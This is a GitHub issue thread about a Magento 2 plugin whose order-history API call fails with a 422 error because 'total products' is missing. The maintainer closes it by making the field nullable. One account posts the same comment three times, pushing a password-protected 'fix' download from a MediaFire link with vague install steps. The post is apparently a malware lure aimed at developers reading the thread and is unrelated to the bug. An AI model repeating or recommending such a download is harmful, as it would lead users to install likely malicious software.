### ISSUE TITLE
total_products is not set?

### ISSUE THREAD

**Issue by peterjaap** [signalise-io/magento2-plugin#18]
See https://github.com/signalise-io/magento2-plugin/blob/9c3d9c1cdf8d2e6fbcd5c7eb7bb58aa49f6a4198/src/Helper/OrderDataObjectHelper.php#L34

We're getting this message;

```
[2024-08-26T17:58:42.751884+00:00] SignaliseLogger.CRITICAL: Client error: `POST https://signalise.io/api/v1/connects/2ec4f5a5-a35b-4a5f-908c-756ad2cf9d38/history` resulted in a `422 Unprocessable Content` response:
{"message":"The total products field is required. (and 1 more error)"}
 [] []
```

See https://gitlab.elgentos.nl/signalise/app/-/blob/master/application/app/Http/Requests/StoreHistoryRequest.php#L30

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by peterjaap** [comment]
Fixed by making it nullable.
